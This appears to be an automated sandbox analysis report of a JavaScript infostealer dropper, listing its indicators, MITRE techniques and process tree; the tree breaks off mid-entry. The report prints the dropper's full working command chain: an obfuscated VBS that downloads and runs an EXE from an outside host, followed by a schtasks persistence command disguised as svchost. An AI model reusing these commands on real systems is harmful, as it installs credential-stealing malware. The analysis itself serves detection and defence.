3248a4b2b6e1514e9a63b2f40f54df79f0eee9592f9c1146e485ebd3fb4998b9

Analysis

max time kernel
137s
max time network
141s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
20/04/2023, 05:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PICS09765432345678001.js
Size

937B
MD5

1de1213f3b92347423fb223ca44d36f1
SHA1

208df542788427737c54b61c99087878d0fcbef7
SHA256

3248a4b2b6e1514e9a63b2f40f54df79f0eee9592f9c1146e485ebd3fb4998b9
SHA512

9d2726b61c54473be66a985d354d01139853f4c9ffaa8801af945ff635d25b2a960f4430f6fad006b12156456008877083f279834abdaaecbd16d8b840df7c25

Score

8^/10

collection spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	560	WScript.exe
6	560	WScript.exe
8	560	WScript.exe
10	560	WScript.exe

Downloads MZ/PE file

Executes dropped EXE 6 IoCs

pid	Process
952	EJV.EXE
1580	EJV.EXE
952	svchost.exe
676	svchost.exe
928	svchost.exe
1060	svchost.exe

Loads dropped DLL 16 IoCs

pid	Process
952	EJV.EXE
1344	WerFault.exe
1344	WerFault.exe
1344	WerFault.exe
1344	WerFault.exe
1344	WerFault.exe
1012	WerFault.exe
1012	WerFault.exe
1012	WerFault.exe
1012	WerFault.exe
1012	WerFault.exe
1616	WerFault.exe
1616	WerFault.exe
1616	WerFault.exe
1616	WerFault.exe
1616	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	EJV.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	EJV.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	EJV.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ipinfo.io
13	ipinfo.io
19	ipinfo.io
25	ipinfo.io
26	ipinfo.io

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 952 set thread context of 1580	952	EJV.EXE	35
PID 952 set thread context of 676	952	svchost.exe	46
PID 928 set thread context of 1060	928	svchost.exe	56

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1344	1580	WerFault.exe	35
1012	676	WerFault.exe	46
1616	1060	WerFault.exe	56

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	EJV.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	EJV.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	svchost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1372	schtasks.exe
1524	schtasks.exe
1672	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1608	timeout.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	EJV.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	EJV.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	WScript.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
952	EJV.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1580	EJV.EXE
Token: SeDebugPrivilege	676	svchost.exe
Token: SeDebugPrivilege	1060	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1808 wrote to memory of 868	1808	wscript.exe	28
PID 1808 wrote to memory of 868	1808	wscript.exe	28
PID 1808 wrote to memory of 868	1808	wscript.exe	28
PID 868 wrote to memory of 560	868	cmd.exe	30
PID 868 wrote to memory of 560	868	cmd.exe	30
PID 868 wrote to memory of 560	868	cmd.exe	30
PID 868 wrote to memory of 1608	868	cmd.exe	33
PID 868 wrote to memory of 1608	868	cmd.exe	33
PID 868 wrote to memory of 1608	868	cmd.exe	33
PID 868 wrote to memory of 952	868	cmd.exe	34
PID 868 wrote to memory of 952	868	cmd.exe	34
PID 868 wrote to memory of 952	868	cmd.exe	34
PID 868 wrote to memory of 952	868	cmd.exe	34
PID 952 wrote to memory of 1580	952	EJV.EXE	35
PID 952 wrote to memory of 1580	952	EJV.EXE	35
PID 952 wrote to memory of 1580	952	EJV.EXE	35
PID 952 wrote to memory of 1580	952	EJV.EXE	35
PID 952 wrote to memory of 1580	952	EJV.EXE	35
PID 952 wrote to memory of 1580	952	EJV.EXE	35
PID 952 wrote to memory of 1580	952	EJV.EXE	35
PID 952 wrote to memory of 1580	952	EJV.EXE	35
PID 952 wrote to memory of 1580	952	EJV.EXE	35
PID 952 wrote to memory of 1084	952	EJV.EXE	36
PID 952 wrote to memory of 1084	952	EJV.EXE	36
PID 952 wrote to memory of 1084	952	EJV.EXE	36
PID 952 wrote to memory of 1084	952	EJV.EXE	36
PID 952 wrote to memory of 1248	952	EJV.EXE	39
PID 952 wrote to memory of 1248	952	EJV.EXE	39
PID 952 wrote to memory of 1248	952	EJV.EXE	39
PID 952 wrote to memory of 1248	952	EJV.EXE	39
PID 952 wrote to memory of 696	952	EJV.EXE	38
PID 952 wrote to memory of 696	952	EJV.EXE	38
PID 952 wrote to memory of 696	952	EJV.EXE	38
PID 952 wrote to memory of 696	952	EJV.EXE	38
PID 1248 wrote to memory of 1524	1248	cmd.exe	42
PID 1248 wrote to memory of 1524	1248	cmd.exe	42
PID 1248 wrote to memory of 1524	1248	cmd.exe	42
PID 1248 wrote to memory of 1524	1248	cmd.exe	42
PID 1580 wrote to memory of 1344	1580	EJV.EXE	43
PID 1580 wrote to memory of 1344	1580	EJV.EXE	43
PID 1580 wrote to memory of 1344	1580	EJV.EXE	43
PID 1580 wrote to memory of 1344	1580	EJV.EXE	43
PID 316 wrote to memory of 952	316	taskeng.exe	45
PID 316 wrote to memory of 952	316	taskeng.exe	45
PID 316 wrote to memory of 952	316	taskeng.exe	45
PID 316 wrote to memory of 952	316	taskeng.exe	45
PID 952 wrote to memory of 676	952	svchost.exe	46
PID 952 wrote to memory of 676	952	svchost.exe	46
PID 952 wrote to memory of 676	952	svchost.exe	46
PID 952 wrote to memory of 676	952	svchost.exe	46
PID 952 wrote to memory of 676	952	svchost.exe	46
PID 952 wrote to memory of 676	952	svchost.exe	46
PID 952 wrote to memory of 676	952	svchost.exe	46
PID 952 wrote to memory of 676	952	svchost.exe	46
PID 952 wrote to memory of 676	952	svchost.exe	46
PID 952 wrote to memory of 1852	952	svchost.exe	47
PID 952 wrote to memory of 1852	952	svchost.exe	47
PID 952 wrote to memory of 1852	952	svchost.exe	47
PID 952 wrote to memory of 1852	952	svchost.exe	47
PID 952 wrote to memory of 1680	952	svchost.exe	48
PID 952 wrote to memory of 1680	952	svchost.exe	48
PID 952 wrote to memory of 1680	952	svchost.exe	48
PID 952 wrote to memory of 1680	952	svchost.exe	48
PID 952 wrote to memory of 1836	952	svchost.exe	49

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\PICS09765432345678001.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1808
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd %temp% &@echo Y3x = " https://upload-wefiles.com/download/PICS09765432345678001.exe">>B3g.vbs &@echo W8r = M8m("jo{Sj}j")>>B3g.vbs &@echo Set S5z = CreateObject(M8m("rx}rqWS}rqmyyu"))>>B3g.vbs &@echo S5z.Open M8m("ljy"), Y3x, False>>B3g.vbs &@echo S5z.send ("")>>B3g.vbs &@echo Set J8g = CreateObject(M8m("fitigSxywjfr"))>>B3g.vbs &@echo J8g.Open>>B3g.vbs &@echo J8g.Type = 1 >>B3g.vbs &@echo J8g.Write S5z.ResponseBody>>B3g.vbs & @echo J8g.Position = 0 >>B3g.vbs &@echo J8g.SaveToFile W8r, 2 >>B3g.vbs &@echo J8g.Close>>B3g.vbs &@echo function M8m(H7m) >> B3g.vbs &@echo For B6c = 1 To Len(H7m) >>B3g.vbs &@echo E7e = Mid(H7m, B6c, 1) >>B3g.vbs &@echo E7e = Chr(Asc(E7e)- 37) >>B3g.vbs &@echo O9c = O9c + E7e >> B3g.vbs &@echo Next >>B3g.vbs &@echo M8m = O9c >>B3g.vbs &@echo End Function >>B3g.vbs& B3g.vbs &dEl B3g.vbs & timeout 13 & EJV.EXE
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:868
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\B3g.vbs"
    3⤵
    - Blocklisted process makes network request
    - Modifies system certificate store
    PID:560
- - C:\Windows\system32\timeout.exe
    timeout 13
    3⤵
    - Delays execution with timeout.exe
    PID:1608
- - C:\Users\Admin\AppData\Local\Temp\EJV.EXE
    EJV.EXE
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    PID:952
  - - C:\Users\Admin\AppData\Local\Temp\EJV.EXE
      "C:\Users\Admin\AppData\Local\Temp\EJV.EXE"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Checks processor information in registry
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1580
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 1764
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:1344
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\svchost"
      4⤵
      PID:1084
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\EJV.EXE" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
      4⤵
      PID:696
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1248
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
        5⤵
        Creates scheduled task(s)
        
        PID:1524

C:\Windows\system32\taskeng.exe
taskeng.exe {19291242-3A6D-4D03-8A6D-2F3B7A714EB3} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:316
- C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:676
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 676 -s 1760
      4⤵
      Loads dropped DLL
      Program crash
      PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\svchost"
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
    3⤵
    PID:1680
  - - C:\Windows\SysWOW64\schtasks.exe
